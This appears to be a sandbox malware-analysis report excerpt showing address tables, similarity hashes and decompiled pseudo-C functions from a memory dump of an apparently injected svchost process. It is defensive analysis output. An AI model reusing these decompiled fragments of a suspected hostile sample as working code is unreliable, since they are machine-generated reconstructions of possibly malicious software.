                                                                                                                                                                                                                                                                      0x0400a7b7
                                                                                                                                                                                                                                                                      0x0400a7b7
                                                                                                                                                                                                                                                                      0x0400a7ba
                                                                                                                                                                                                                                                                      0x0400a811
                                                                                                                                                                                                                                                                      0x0400a813
                                                                                                                                                                                                                                                                      0x0400a815
                                                                                                                                                                                                                                                                      0x0400a834
                                                                                                                                                                                                                                                                      0x0400a834
                                                                                                                                                                                                                                                                      0x0400a836
                                                                                                                                                                                                                                                                      0x0400a855
                                                                                                                                                                                                                                                                      0x0400a855
                                                                                                                                                                                                                                                                      0x0400a857
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a85d
                                                                                                                                                                                                                                                                      0x0400a85f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a865
                                                                                                                                                                                                                                                                      0x0400a867
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a86d
                                                                                                                                                                                                                                                                      0x0400a86f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a875
                                                                                                                                                                                                                                                                      0x0400a877
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a87d
                                                                                                                                                                                                                                                                      0x0400a87f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a885
                                                                                                                                                                                                                                                                      0x0400a896
                                                                                                                                                                                                                                                                      0x0400a89c
                                                                                                                                                                                                                                                                      0x0400a8a2
                                                                                                                                                                                                                                                                      0x0400a8a4
                                                                                                                                                                                                                                                                      0x0400a8ab
                                                                                                                                                                                                                                                                      0x0400a8cf
                                                                                                                                                                                                                                                                      0x0400a8db
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a8db
                                                                                                                                                                                                                                                                      0x0400a8b3
                                                                                                                                                                                                                                                                      0x0400a8b9
                                                                                                                                                                                                                                                                      0x0400a8be
                                                                                                                                                                                                                                                                      0x0400a8c1
                                                                                                                                                                                                                                                                      0x0400a8c7
                                                                                                                                                                                                                                                                      0x0400a8c9
                                                                                                                                                                                                                                                                      0x0400a578
                                                                                                                                                                                                                                                                      0x0400a580
                                                                                                                                                                                                                                                                      0x0400a581
                                                                                                                                                                                                                                                                      0x0400a582
                                                                                                                                                                                                                                                                      0x0400a583
                                                                                                                                                                                                                                                                      0x0400a584
                                                                                                                                                                                                                                                                      0x0400a585
                                                                                                                                                                                                                                                                      0x0400a594
                                                                                                                                                                                                                                                                      0x0400a596
                                                                                                                                                                                                                                                                      0x0400a59c
                                                                                                                                                                                                                                                                      0x0400a59c
                                                                                                                                                                                                                                                                      0x0400a5a0
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a5a0
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a8c9
                                                                                                                                                                                                                                                                      0x0400a838
                                                                                                                                                                                                                                                                      0x0400a83c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a840
                                                                                                                                                                                                                                                                      0x0400a84a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a84a
                                                                                                                                                                                                                                                                      0x0400a817
                                                                                                                                                                                                                                                                      0x0400a81b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a81f
                                                                                                                                                                                                                                                                      0x0400a829
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a7bc
                                                                                                                                                                                                                                                                      0x0400a7bc
                                                                                                                                                                                                                                                                      0x0400a7bf
                                                                                                                                                                                                                                                                      0x0400a805
                                                                                                                                                                                                                                                                      0x0400a7c1
                                                                                                                                                                                                                                                                      0x0400a7c1
                                                                                                                                                                                                                                                                      0x0400a7c4
                                                                                                                                                                                                                                                                      0x0400a7de
                                                                                                                                                                                                                                                                      0x0400a7e1
                                                                                                                                                                                                                                                                      0x0400a7f9
                                                                                                                                                                                                                                                                      0x0400a7e3
                                                                                                                                                                                                                                                                      0x0400a7e4
                                                                                                                                                                                                                                                                      0x0400a7ee
                                                                                                                                                                                                                                                                      0x0400a7ee
                                                                                                                                                                                                                                                                      0x0400a7c6
                                                                                                                                                                                                                                                                      0x0400a7c6
                                                                                                                                                                                                                                                                      0x0400a7c9
                                                                                                                                                                                                                                                                      0x0400a7cf
                                                                                                                                                                                                                                                                      0x0400a7cf
                                                                                                                                                                                                                                                                      0x0400a7c9
                                                                                                                                                                                                                                                                      0x0400a7c4
                                                                                                                                                                                                                                                                      0x0400b032
                                                                                                                                                                                                                                                                      0x0400b032
                                                                                                                                                                                                                                                                      0x0400b032
                                                                                                                                                                                                                                                                      0x0400b038
                                                                                                                                                                                                                                                                      0x0400b03a
                                                                                                                                                                                                                                                                      0x0400b040
                                                                                                                                                                                                                                                                      0x0400b042
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400b044
                                                                                                                                                                                                                                                                      0x0400b050
                                                                                                                                                                                                                                                                      0x0400a638
                                                                                                                                                                                                                                                                      0x0400a639
                                                                                                                                                                                                                                                                      0x0400a640
                                                                                                                                                                                                                                                                      0x0400a646
                                                                                                                                                                                                                                                                      0x0400a650
                                                                                                                                                                                                                                                                      0x0400a652
                                                                                                                                                                                                                                                                      0x0400a667
                                                                                                                                                                                                                                                                      0x0400a667
                                                                                                                                                                                                                                                                      0x0400a654
                                                                                                                                                                                                                                                                      0x0400a65e
                                                                                                                                                                                                                                                                      0x0400a661
                                                                                                                                                                                                                                                                      0x0400a669
                                                                                                                                                                                                                                                                      0x0400a673
                                                                                                                                                                                                                                                                      0x0400a676
                                                                                                                                                                                                                                                                      0x0400a677
                                                                                                                                                                                                                                                                      0x0400a67d
                                                                                                                                                                                                                                                                      0x0400a67f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a685
                                                                                                                                                                                                                                                                      0x0400a685
                                                                                                                                                                                                                                                                      0x0400a685
                                                                                                                                                                                                                                                                      0x0400a67f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400a646
                                                                                                                                                                                                                                                                      0x0400b057
                                                                                                                                                                                                                                                                      0x0400b05e
                                                                                                                                                                                                                                                                      0x0400b060
                                                                                                                                                                                                                                                                      0x0400b066
                                                                                                                                                                                                                                                                      0x0400b066
                                                                                                                                                                                                                                                                      0x0400b066
                                                                                                                                                                                                                                                                      0x0400b066
                                                                                                                                                                                                                                                                      0x0400b06a
                                                                                                                                                                                                                                                                      0x0400b070
                                                                                                                                                                                                                                                                      0x0400b073
                                                                                                                                                                                                                                                                      0x0400b074
                                                                                                                                                                                                                                                                      0x0400b077
                                                                                                                                                                                                                                                                      0x0400b07e
                                                                                                                                                                                                                                                                      0x0400b07e

                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: $2$l
                                                                                                                                                                                                                                                                      • API String ID: 0-3132104027
                                                                                                                                                                                                                                                                      • Opcode ID: 33ce8aebcf81edaf52939c3371d537490426ca7ff4ef4ab249f69b2ed4e8911d
                                                                                                                                                                                                                                                                      • Instruction ID: 97a9dc216c0970bdd76ba4c43342de9e9df9d78a676d099925bbab2bb04a16ba
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33ce8aebcf81edaf52939c3371d537490426ca7ff4ef4ab249f69b2ed4e8911d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD41DD30A862688AFF74CE64889C3F87BF5AB11359F4481CAC0A97A1C1C7757B86CF01
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                                                                                                                                      			E04011930(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				void _v36;
                                                                                                                                                                                                                                                                      				signed short _v40;
                                                                                                                                                                                                                                                                      				signed short _v42;
                                                                                                                                                                                                                                                                      				signed short _v44;
                                                                                                                                                                                                                                                                      				signed short _v46;
                                                                                                                                                                                                                                                                      				signed short _v50;
                                                                                                                                                                                                                                                                      				signed short _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* _t56;
                                                                                                                                                                                                                                                                      				signed int _t77;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t56 = __ebx;
                                                                                                                                                                                                                                                                      				_v8 =  *0x429024 ^ _t77;
                                                                                                                                                                                                                                                                      				_v76 = __ecx;
                                                                                                                                                                                                                                                                      				_v56 = 0;
                                                                                                                                                                                                                                                                      				memcpy( &_v36, 0x427060, 6 << 2);
                                                                                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                                                                                      				_v64 = E04020CE0(0x29);
                                                                                                                                                                                                                                                                      				_v60 = _v64;
                                                                                                                                                                                                                                                                      				E04007010(0x42706c, _v60, 0, 0x29);
                                                                                                                                                                                                                                                                      				 *0x425180( &_v52);
                                                                                                                                                                                                                                                                      				 *0x4251f8(_v60, 0x28,  &_v36, _v52 & 0x0000ffff, _v50 & 0x0000ffff, _v46 & 0x0000ffff, _v44 & 0x0000ffff, _v42 & 0x0000ffff, _v40 & 0x0000ffff);
                                                                                                                                                                                                                                                                      				_v68 = E04020CE0(8);
                                                                                                                                                                                                                                                                      				if(_v68 == 0) {
                                                                                                                                                                                                                                                                      					_v80 = 0;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v80 = E0401F4E0(_v68);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t72 = _v80;
                                                                                                                                                                                                                                                                      				_v56 = _v80;
                                                                                                                                                                                                                                                                      				E0401FC90(_t56, _v56, 0x42706c, 0x427060, _v60, E040070A0(_v60));
                                                                                                                                                                                                                                                                      				if(_v60 != 0) {
                                                                                                                                                                                                                                                                      					_t72 = _v60;
                                                                                                                                                                                                                                                                      					_v72 = _v60;
                                                                                                                                                                                                                                                                      					E04020CC0(_v72);
                                                                                                                                                                                                                                                                      					_v60 = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return E04006C8C(_v56, _t56, _v8 ^ _t77, _t72, 0x42706c, 0x427060);
                                                                                                                                                                                                                                                                      			}






















                                                                                                                                                                                                                                                                      0x04011930
                                                                                                                                                                                                                                                                      0x0401193d
                                                                                                                                                                                                                                                                      0x04011942
                                                                                                                                                                                                                                                                      0x04011945
                                                                                                                                                                                                                                                                      0x04011959
                                                                                                                                                                                                                                                                      0x0401195b
                                                                                                                                                                                                                                                                      0x04011966
                                                                                                                                                                                                                                                                      0x0401196c
                                                                                                                                                                                                                                                                      0x04011977
                                                                                                                                                                                                                                                                      0x04011983
                                                                                                                                                                                                                                                                      0x040119b1
                                                                                                                                                                                                                                                                      0x040119c4
                                                                                                                                                                                                                                                                      0x040119cb
                                                                                                                                                                                                                                                                      0x040119da
                                                                                                                                                                                                                                                                      0x040119cd
                                                                                                                                                                                                                                                                      0x040119d5
                                                                                                                                                                                                                                                                      0x040119d5
                                                                                                                                                                                                                                                                      0x040119e1
                                                                                                                                                                                                                                                                      0x040119e4
                                                                                                                                                                                                                                                                      0x040119fb
                                                                                                                                                                                                                                                                      0x04011a04
                                                                                                                                                                                                                                                                      0x04011a06
                                                                                                                                                                                                                                                                      0x04011a09
                                                                                                                                                                                                                                                                      0x04011a10
                                                                                                                                                                                                                                                                      0x04011a18
                                                                                                                                                                                                                                                                      0x04011a18
                                                                                                                                                                                                                                                                      0x04011a31

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                                      • String ID: `pB
                                                                                                                                                                                                                                                                      • API String ID: 3713721629-8080248
                                                                                                                                                                                                                                                                      • Opcode ID: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                                      • Instruction ID: 23dbd6e54e78f367103934f2d22059264fab70093216257e69c110f1ce7c75f9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01313CB1D01218ABEB14EFD5E944AEEBBB5EF4C308F104029F505B7280E7756944CB61
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                                                                                                                                      			E04005630(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                                                                                      				E04007010(_t53, _v8, 0, 0x14);
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x34)) = 0x77777777;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x14)) =  *0x4250c0(0, 1, 0, 0, __ecx);
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x1c)) = 0;
                                                                                                                                                                                                                                                                      				E04007010(_t53, _v8 + 0x20, 0, 8);
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x28)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x2c)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x30)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x18)) = 0;
                                                                                                                                                                                                                                                                      				E04007010(_t53, _v8 + 0x38, 0, 0x10);
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x48)) = 0x10;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x4c)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x50)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v8 + 0x54)) = 0;
                                                                                                                                                                                                                                                                      				 *((char*)(_v8 + 0x58)) = 0;
                                                                                                                                                                                                                                                                      				return _v8;
                                                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                                                      0x04005634
                                                                                                                                                                                                                                                                      0x0400563f
                                                                                                                                                                                                                                                                      0x0400564a
                                                                                                                                                                                                                                                                      0x04005662
                                                                                                                                                                                                                                                                      0x04005668
                                                                                                                                                                                                                                                                      0x0400567a
                                                                                                                                                                                                                                                                      0x04005685
                                                                                                                                                                                                                                                                      0x0400568f
                                                                                                                                                                                                                                                                      0x04005699
                                                                                                                                                                                                                                                                      0x040056a3
                                                                                                                                                                                                                                                                      0x040056b5
                                                                                                                                                                                                                                                                      0x040056c0
                                                                                                                                                                                                                                                                      0x040056ca
                                                                                                                                                                                                                                                                      0x040056d4
                                                                                                                                                                                                                                                                      0x040056de
                                                                                                                                                                                                                                                                      0x040056e8
                                                                                                                                                                                                                                                                      0x040056f2

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                                                      • String ID: wwww
                                                                                                                                                                                                                                                                      • API String ID: 2102423945-671953474
                                                                                                                                                                                                                                                                      • Opcode ID: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                                      • Instruction ID: 7ac7e521c84300ad453423b6d132e18307e481511a592d402c42c44ac5e64213
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E21B874A40208EBEB54CF94D995B9EB7B1BB48708F204588E9046F3C1D7B6AF45EBC4
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                                                                                      			E04020E40(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                      				intOrPtr* _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				signed int _v76;
                                                                                                                                                                                                                                                                      				signed int _t114;
                                                                                                                                                                                                                                                                      				intOrPtr _t119;
                                                                                                                                                                                                                                                                      				intOrPtr _t122;
                                                                                                                                                                                                                                                                      				intOrPtr _t126;
                                                                                                                                                                                                                                                                      				signed int _t127;
                                                                                                                                                                                                                                                                      				intOrPtr _t130;
                                                                                                                                                                                                                                                                      				intOrPtr _t134;
                                                                                                                                                                                                                                                                      				signed int _t153;
                                                                                                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                                                                                                      				signed int _t156;
                                                                                                                                                                                                                                                                      				signed int _t169;
                                                                                                                                                                                                                                                                      				signed int _t209;
                                                                                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                                                                                      				void* _t214;
                                                                                                                                                                                                                                                                      				void* _t215;
                                                                                                                                                                                                                                                                      				void* _t217;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t213 = __esi;
                                                                                                                                                                                                                                                                      				_t212 = __edi;
                                                                                                                                                                                                                                                                      				_t156 = __ecx;
                                                                                                                                                                                                                                                                      				_t155 = __ebx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					_t114 = E04021D10(_t156,  *0x42a2a8);
                                                                                                                                                                                                                                                                      					_t215 = _t214 + 4;
                                                                                                                                                                                                                                                                      					_v20 = _t114;
                                                                                                                                                                                                                                                                      					if((_v20 & 0x0000ffff) < 1 || (_v20 & 0x0000ffff) > 0x80c) {
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t119 = E04021D30(_t155, _t212, _t213, 0x42a2ac, _v20 & 0x0000ffff, 0x429fb0,  *0x429fac,  &_v12);
                                                                                                                                                                                                                                                                      					_t215 = _t215 + 0x14;
                                                                                                                                                                                                                                                                      					_v16 = _t119;
                                                                                                                                                                                                                                                                      					__eflags = _v16 - 5;
                                                                                                                                                                                                                                                                      					if(_v16 >= 5) {
                                                                                                                                                                                                                                                                      						__eflags = _v12;
                                                                                                                                                                                                                                                                      						if(_v12 != 0) {
                                                                                                                                                                                                                                                                      							_t122 = E040223A0(_v12 + 4, _v16 - 4);
                                                                                                                                                                                                                                                                      							_t215 = _t215 + 8;
                                                                                                                                                                                                                                                                      							_v36 = _t122;
                                                                                                                                                                                                                                                                      							__eflags = _v36 -  *_v12;
                                                                                                                                                                                                                                                                      							if(_v36 ==  *_v12) {
                                                                                                                                                                                                                                                                      								_t126 = E040070A0(_v12 + 0xc);
                                                                                                                                                                                                                                                                      								_t215 = _t215 + 4;
                                                                                                                                                                                                                                                                      								_v40 = _t126;
                                                                                                                                                                                                                                                                      								__eflags = _v40 - 1;
                                                                                                                                                                                                                                                                      								if(_v40 >= 1) {
                                                                                                                                                                                                                                                                      									_v24 = _v40 + 0xd;
                                                                                                                                                                                                                                                                      									__eflags = _v12 + _v24;
                                                                                                                                                                                                                                                                      									_t127 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                                      									_t215 = _t215 + 4;
                                                                                                                                                                                                                                                                      									_v44 = _t127;
                                                                                                                                                                                                                                                                      									_v32 = 0;
                                                                                                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                                                                                                      										__eflags = _v44;
                                                                                                                                                                                                                                                                      										if(_v44 <= 0) {
                                                                                                                                                                                                                                                                      											break;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                      										_v24 = _v24 + _v44 + 1;
                                                                                                                                                                                                                                                                      										_t153 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                                      										_t215 = _t215 + 4;
                                                                                                                                                                                                                                                                      										_v44 = _t153;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									__eflags = _v32 - 1;
                                                                                                                                                                                                                                                                      									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                      										_push( ~(0 | __eflags > 0x00000000) | _v32 * 0x00000004);
                                                                                                                                                                                                                                                                      										_t130 = E0400708A();
                                                                                                                                                                                                                                                                      										_t217 = _t215 + 4;
                                                                                                                                                                                                                                                                      										_v60 = _t130;
                                                                                                                                                                                                                                                                      										_v28 = _v60;
                                                                                                                                                                                                                                                                      										_v24 = _v40 + 0xd;
                                                                                                                                                                                                                                                                      										_v48 = 0;
                                                                                                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                                                                                                      											__eflags = _v48 - _v32;
                                                                                                                                                                                                                                                                      											if(_v48 >= _v32) {
                                                                                                                                                                                                                                                                      												break;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_v44 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                                      											_push(_v44 + 1);
                                                                                                                                                                                                                                                                      											_v64 = E0400708A();
                                                                                                                                                                                                                                                                      											_v52 = _v64;
                                                                                                                                                                                                                                                                      											_push(_v44);
                                                                                                                                                                                                                                                                      											E04006CA0(_t155, _t212, _t213, _v52, _v12 + _v24);
                                                                                                                                                                                                                                                                      											_t217 = _t217 + 0x14;
                                                                                                                                                                                                                                                                      											 *((char*)(_v52 + _v44)) = 0;
                                                                                                                                                                                                                                                                      											 *((intOrPtr*)(_v28 + _v48 * 4)) = _v52;
                                                                                                                                                                                                                                                                      											_v24 = _v24 + _v44 + 1;
                                                                                                                                                                                                                                                                      											_t209 = _v48 + 1;
                                                                                                                                                                                                                                                                      											__eflags = _t209;
                                                                                                                                                                                                                                                                      											_v48 = _t209;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_v68 = E04020CE0(0x14);
                                                                                                                                                                                                                                                                      										_v8 = _v68;
                                                                                                                                                                                                                                                                      										_t134 = _v8;
                                                                                                                                                                                                                                                                      										_t169 = _v12;
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_t134 + 0xc)) =  *((intOrPtr*)(_t169 + 4));
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_t134 + 0x10)) =  *((intOrPtr*)(_t169 + 8));
                                                                                                                                                                                                                                                                      										_push(_v40 + 1);
                                                                                                                                                                                                                                                                      										_v72 = E0400708A();
                                                                                                                                                                                                                                                                      										 *_v8 = _v72;
                                                                                                                                                                                                                                                                      										_push(_v40);
                                                                                                                                                                                                                                                                      										E04006CA0(_t155, _t212, _t213,  *_v8, _v12 + 0xc);
                                                                                                                                                                                                                                                                      										_t214 = _t217 + 0x14;
                                                                                                                                                                                                                                                                      										 *((char*)( *_v8 + _v40)) = 0;
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_v8 + 4)) = _v28;
                                                                                                                                                                                                                                                                      										 *(_v8 + 8) = _v32;
                                                                                                                                                                                                                                                                      										_t156 = 0;
                                                                                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                                                                                      										if(0 != 0) {
                                                                                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								__eflags = _v12;
                                                                                                                                                                                                                                                                      								if(_v12 != 0) {
                                                                                                                                                                                                                                                                      									_v56 = _v12;
                                                                                                                                                                                                                                                                      									E04020CC0(_v56);
                                                                                                                                                                                                                                                                      									_t215 = _t215 + 4;
                                                                                                                                                                                                                                                                      									_v12 = 0x666;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L23:
                                                                                                                                                                                                                                                                      					if(_v12 != 0) {
                                                                                                                                                                                                                                                                      						_v76 = _v12;
                                                                                                                                                                                                                                                                      						E04020CC0(_v76);
                                                                                                                                                                                                                                                                      						_v12 = 0x666;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return _v8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L23;
                                                                                                                                                                                                                                                                      			}






































                                                                                                                                                                                                                                                                      0x04020e40
                                                                                                                                                                                                                                                                      0x04020e40
                                                                                                                                                                                                                                                                      0x04020e40
                                                                                                                                                                                                                                                                      0x04020e40
                                                                                                                                                                                                                                                                      0x04020e46
                                                                                                                                                                                                                                                                      0x04020e4d
                                                                                                                                                                                                                                                                      0x04020e54
                                                                                                                                                                                                                                                                      0x04020e5a
                                                                                                                                                                                                                                                                      0x04020e5f
                                                                                                                                                                                                                                                                      0x04020e62
                                                                                                                                                                                                                                                                      0x04020e6d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020e9a
                                                                                                                                                                                                                                                                      0x04020e9f
                                                                                                                                                                                                                                                                      0x04020ea2
                                                                                                                                                                                                                                                                      0x04020ea5
                                                                                                                                                                                                                                                                      0x04020ea9
                                                                                                                                                                                                                                                                      0x04020eab
                                                                                                                                                                                                                                                                      0x04020eaf
                                                                                                                                                                                                                                                                      0x04020ec4
                                                                                                                                                                                                                                                                      0x04020ec9
                                                                                                                                                                                                                                                                      0x04020ecc
                                                                                                                                                                                                                                                                      0x04020ed5
                                                                                                                                                                                                                                                                      0x04020ed7
                                                                                                                                                                                                                                                                      0x04020f04
                                                                                                                                                                                                                                                                      0x04020f09
